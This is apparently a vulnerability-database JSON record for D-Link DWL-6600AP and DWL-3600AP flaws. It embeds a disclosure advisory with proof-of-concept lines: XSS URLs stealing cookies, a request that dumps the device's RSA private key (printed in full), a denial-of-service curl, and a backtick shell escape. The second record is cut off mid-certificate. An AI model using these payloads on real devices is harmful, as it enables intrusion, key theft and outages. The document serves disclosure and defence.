"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14338",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-14338",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNVD",
"id": "CNVD-2019-29147",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201907-1626",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-146274",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"db": "VULHUB",
"id": "VHN-146274"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1626"
},
{
"db": "NVD",
"id": "CVE-2019-14338"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a post-authentication admin.cgi?action= XSS vulnerability on the management interface. D-Link 6600-AP and DWL-3600AP The device contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. A buffer overflow vulnerability exists in the D-Link 6600-AP and DWL-3600AP. The vulnerability stems from a network system or product that does not properly validate data boundaries when performing operations on memory, causing erroneous read and write operations to be performed on other associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow. The vulnerability stems from the lack of correct validation of client data in WEB applications. # Security Advisory - 22/07/2019\n\n## Multiple vulnerabilities found in the D-Link 6600-AP device running\nthe latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced\nanymore but the support is still provided by D-Link as per described\non the D-Link website. Not that this product is built for business\ncustomers of D-Link and we can expect to have thousands of devices at\nrisk. Code base shared with DWL-3600AP and DWL-8610AP\n\n### This advisory is sent to D-Link the 22/05/2019\nMany Thanks to the D-Link Security Team for their prompt reactivity!\n\n### Affected Product\nD-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP\n\n### Firmware version\n4.2.0.14 Revision Ax date: 21/03/2019\n\n### Last version available\nhttps://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n### Product Identifier\nWLAN-EAP\n\n### Hardware Version\nA2\n\n### Manufacturer\nD-LINK\n\n## Product Description\nThe DWL-6600AP is designed to be the best-in-class indoor Access Point\nfor business environments. With high data transmission speeds, load\nbalancing features, it can be deployed as a standalone wireless Access\nPoint or used as the foundation for a managed wireless network. \nSource: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point\n\n## List of Vulnerabilities\n\n 1. CVE-2019-14338 - Post-authenticated XSS\n 2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private\nKey extraction\nthrough http command\n 3. CVE-2019-14333 - Pre-authenticated Denial of service leading to\nthe reboot of the AP\n 4. CVE-2019-14337 - Escape shell in the restricted command line interface\n 5. CVE-2019-14335 - Post-authenticated Denial of service leading to\nthe reboot of the AP\n 6. CVE-2019-14336 - Post-authenticated Dump all the config files (post-auth)\n 7. CVE-2019-14332 - Use of weak ciphers for SSH\n\n### 1. Post-authenticated XSS\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14338\n#### Proof-of concept\n\nExample 1: http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e\n\nExample 2: http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027Pwned\u0027)\u003c/script\u003e\n\n### 2. Post-authenticated Certificate and RSA Private Key extraction\nthrough http command\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14334\n#### Proof-of concept\n\nhttp://10.90.90.91/sslcert-get.cgi?\n\nResult of the command: File \"mini_httpd.pem\" automatically extracted\n\n-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee\nHk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o\nBioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B\nvsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t\n7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c\nunyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk\n1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6\nJ8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14\nyRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z\n0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc\nfmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB\ni5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb\ndAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ\nOztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ\nVuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9\nJ3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr\nH975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw\nuF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy\nyGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd\npagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co\npaZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8\n1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm\nfPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS\nokObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px\nbgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY\n-----END RSA PRIVATE KEY-----\n-----BEGIN CERTIFICATE-----\nMIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx\nMC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp\nbmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL\nMAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU\nMBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG\nA1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE\nCBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu\nOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB\nBQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp\nwRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC\nI+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW\n2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK\nYwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N\n29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B\nAQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS\n7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME\n9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5\nbeF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE\n45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef\nMjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ==\n-----END CERTIFICATE-----\n\n### 3. Pre-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID: CVE-2019-14333\n#### Proof-of concept\n kali# curl -X POST\n\u0027http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n\n### 4. Escape shell in the restricted command line interface\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14337\n#### Proof-of concept\n\nDLINK-WLAN-AP# wget\nInvalid command. \nDLINK-WLAN-AP# `/bin/sh -c wget`\nBusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary. \nUsage: wget [-c|--continue] [-s|--spider] [-q|--quiet]\n[-O|--output-document FILE]\n [--header \u0027header: value\u0027] [-Y|--proxy on/off] [-P DIR]\n [--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL\n\nRetrieve files via HTTP or FTP\n\nOptions:\n -s Spider mode - only check file existence\n -c Continue retrieval of aborted transfer\n -q Quiet\n -P DIR Save to DIR (default .)\n -T SEC Network read timeout is SEC seconds\n -O FILE Save to FILE (\u0027-\u0027 for stdout)\n -U STR Use STR for User-Agent header\n -Y Use proxy (\u0027on\u0027 or \u0027off\u0027)\n\nDLINK-WLAN-AP#\n\n### 5. Post-authenticated Denial of service leading to the reboot of the AP\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14335\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=%s\n\n### 6. Post-authenticated Dump all the config files\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14336\n#### Proof-of concept\n\nhttp://10.90.90.91/admin.cgi?action=\n\n### 7. Use of weak ciphers\n#### Exploitation: Local\n#### Severity Level: High\n#### CVE ID : CVE-2019-14332\n#### Proof-of concept\n\nroot@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1\nThe authenticity of host \u002710.90.90.91 (10.90.90.91)\u0027 can\u0027t be established. \nRSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI. \nAre you sure you want to continue connecting (yes/no)? yes\nWarning: Permanently added \u002710.90.90.91\u0027 (RSA) to the list of known hosts. \nadmin@10.90.90.91\u0027s password:\nEnter \u0027help\u0027 for help. \n\nDLINK-WLAN-AP# help\n\n## Report Timeline\n22/05/2019 : This advisory is sent to D-Link - the contents of this\nReport will be made public within 30 days. \n22/06/2019 : Public release of the security advisory to mailing list\n\n## Fixes/Updates\nftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip\nftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip\n\n\n## About me - pwn.sandstorm@gmail.com\n#### Independent EMSecurity Researcher in the field of IoT under the Sun\n#### Always open to hack and share\n#### Greetings - Ack P. Kim and others for the online resources\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14338"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"db": "VULHUB",
"id": "VHN-146274"
},
{
"db": "PACKETSTORM",
"id": "153840"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-14338",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "153840",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1626",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2019-29147",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-146274",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"db": "VULHUB",
"id": "VHN-146274"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1626"
},
{
"db": "NVD",
"id": "CVE-2019-14338"
}
]
},
"id": "VAR-201908-0916",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"db": "VULHUB",
"id": "VHN-146274"
}
],
"trust": 1.4935897333333332
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29147"
}
]
},
"last_update_date": "2024-11-23T21:52:00.589000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Security Advisory",
"trust": 0.8,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"title": "Security Bulletin",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Patch for D-Link 6600-AP and DWL-3600AP Buffer Overflow Vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/177593"
},
{
"title": "D-Link 6600-AP and DWL-3600AP Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=95738"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1626"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-146274"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"db": "NVD",
"id": "CVE-2019-14338"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/153840/d-link-6600-ap-xss-dos-information-disclosure.html"
},
{
"trust": 1.7,
"url": "https://us.dlink.com/en/security-advisory"
},
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14338"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-14338"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14336"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14335"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14333"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=%s"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=+guest\u003cscript\u003ealert(\u0027pwned\u0027)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14337"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action=\u003cscript\u003ealert(document.cookie)\u003c/script\u003e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14334"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/sslcert-get.cgi?"
},
{
"trust": 0.1,
"url": "https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point"
},
{
"trust": 0.1,
"url": "http://10.90.90.91/admin.cgi?action="
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"db": "VULHUB",
"id": "VHN-146274"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1626"
},
{
"db": "NVD",
"id": "CVE-2019-14338"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"db": "VULHUB",
"id": "VHN-146274"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"db": "PACKETSTORM",
"id": "153840"
},
{
"db": "CNNVD",
"id": "CNNVD-201907-1626"
},
{
"db": "NVD",
"id": "CVE-2019-14338"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"date": "2019-08-01T00:00:00",
"db": "VULHUB",
"id": "VHN-146274"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"date": "2019-07-31T19:01:29",
"db": "PACKETSTORM",
"id": "153840"
},
{
"date": "2019-07-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1626"
},
{
"date": "2019-08-01T13:15:14.337000",
"db": "NVD",
"id": "CVE-2019-14338"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-08-28T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-29147"
},
{
"date": "2019-08-05T00:00:00",
"db": "VULHUB",
"id": "VHN-146274"
},
{
"date": "2019-08-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-007263"
},
{
"date": "2019-08-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201907-1626"
},
{
"date": "2024-11-21T04:26:32.490000",
"db": "NVD",
"id": "CVE-2019-14338"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1626"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link 6600-AP and DWL-3600AP Device cross-site scripting vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-007263"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201907-1626"
}
],
"trust": 0.6
}
}
VAR-201908-0914
Vulnerability from variot - Updated: 2024-11-23 21:52An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated dump of all of the config files through a certain admin.cgi?action= insecure HTTP request. D-Link 6600-AP and DWL-3600AP The device contains an input validation vulnerability.Information may be obtained. D-Link DWL-6600AP is a dual-band unified management wireless access point device designed for enterprise environments. D-Link DWL-3600AP is a single-frequency unified management wireless access point device designed for enterprise environments.
D-Link DWL-6600AP and DWL-3600AP 4.2.0.14 have configuration file dump vulnerability. A security vulnerability exists in D-Link 6600-AP and DWL-3600AP version 4.2.0.14. # Security Advisory - 22/07/2019
Multiple vulnerabilities found in the D-Link 6600-AP device running
the latest firmware (version 4.2.0.14). D-Link 6600-AP is not produced anymore but the support is still provided by D-Link as per described on the D-Link website. Not that this product is built for business customers of D-Link and we can expect to have thousands of devices at risk. Code base shared with DWL-3600AP and DWL-8610AP
This advisory is sent to D-Link the 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!
Affected Product
D-Link 6600-AP, DWL-3600AP + Vulnerability number 2 affects also DWL-8610AP
Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
Product Identifier
WLAN-EAP
Hardware Version
A2
Manufacturer
D-LINK
Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds, load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network. Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
List of Vulnerabilities
- CVE-2019-14338 - Post-authenticated XSS
- CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
- CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14337 - Escape shell in the restricted command line interface
- CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP
- CVE-2019-14332 - Use of weak ciphers for SSH
1. Post-authenticated XSS
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14338
Proof-of concept
Example 1: http://10.90.90.91/admin.cgi?action=alert(document.cookie)
Example 2: http://10.90.90.91/admin.cgi?action=+guestalert('Pwned')
2. Post-authenticated Certificate and RSA Private Key extraction
through http command
Exploitation: Local
Severity Level: High
CVE ID : CVE-2019-14334
Proof-of concept
http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted
-----BEGIN RSA PRIVATE KEY----- MIIEowIBAAKCAQEAoGIBvZNlPN9AamssqnZj4Rmyox1t3OzN4KyAy5lI5inBHCee Hk5LPqKSS9hUn6Aia+ym6GYbYhrw2T7qSlXmdtIzqmC6ctw/1Zg/Nv7upcIj6s+o BioQrS3i++3pDqkenj7HqWb3NP7ExMmGEnzkMMVHGOkJew31VXBrI5d7INbaAg1B vsMYlUANfg96QLySyC6AwiZv55d6DpmgFzt7r8Yx6hkhZsxL9ZB4O8QnvEpjAL9t 7KUgVXtsO1FBYwp/elhK1nGtIcj1iq26G6e+vN61ePNjxIw3pwegbELrnc3b0f6c unyx9ntVNHC4yt3japRfFgxrMY4kgRgXfWej3wIDAQABAoIBAQCY25AJHPg6QhVk 1+zkMp4TJqjpad0R2OiHoCHI6rleFKGmseOzwq9YbR2+B9rvoHHuJskVamvi3wZ6 J8qpOqHC0ajIVBSf8GcurkJhqivN8/DDlVLxPRpT1A4oSqH7hRhXfkJRpH8sFT14 yRFtgXcDPKL8jO6qR61x1wlmDLQfoOPBnBjW9eDb5V5C/pNml3FgEs2XRh19py9Z 0AvKjyk/QJHRKSQ7cy2Qm5MFj9yulTFeTEVkXnPqOi8C0aZOqTFWxLi/TMUTHbsc fmDG0qkkiZMHw7K4kxWA1+ipkoBCCHjGoMrAOvyCm+MqapZQBScMMz2i13ekmADB i5Ka5fmRAoGBANT4rZONkQ/qFiPXTfwPSYCO9IPTJ+ZZQD1CbZt09r2HpN+bEfVb dAacfLWjPhG2hGlaYPDoGXqTN9llZI6qkR6TyutlOBbGG2TmR19cN60k3sgOm/eJ OztmyIWGeRsWlaP0Yvo+zySSzWOm1HdK0gLL+aJKd7/q9rtLxseCgxabAoGBAMDJ VuqAUWeKmrgMydgTlZ0IgtgcxpCwN1Spv0ECpygVrfPp0OCx+bsdajUBL/vha5Q9 J3JmaPC3rE0mIzhH7n0jrUkhSCCTfOo7+wSZzK2q6D+CykTLfm/zobeAy/Z+k7Wr H975ALD3R+qog44sGnBnznHZkYcRxYNy2/a6t1oNAoGAPJbnIwRykbmCRP4bFKvw uF9zVxG610DrEsKUVlbnX7J4iJkgedJj5wGcRTzFCtsHPsXUsJUHsqSxjerXufLy yGU5pNCuLWR9JK6S/aFJwbusmfP2EW18aYDraXmBeOBrADMl+ZXm7rvJLSGobqvd pagMREy1Vuds/IopaldKHiMCgYAQcNs1sm2+y8Y4Dfcksz7eHnyyG3ofmreNQ9Co paZFt9uW4ojKsMLgXzjQfmJuM6IuCS0VB4DJjpBmH+t/ADtpdqJviyQQiyNrAmR8 1vTqlpmp2OiRB12oBHn1IUnDorXMF2TnagrSDLSYYXiepko27dNgSDKt9ykF9cSm fPPn/QKBgFMVmV/rBJBHZvlOy00spSpbHXRnKqh+eTchjRfsUJJIxwJ08sI94dYS okObkFKhW+Kin1IjNv5EYBJBxBi/JOPRxuyS4WwCMM++NSgqmqjPdWxhQ1lD87px bgg22CyrDBw92O4AjPIln+OvdDCKgkwhQPFwBi5K1qKCvV08SrxY -----END RSA PRIVATE KEY----- -----BEGIN CERTIFICATE----- MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp 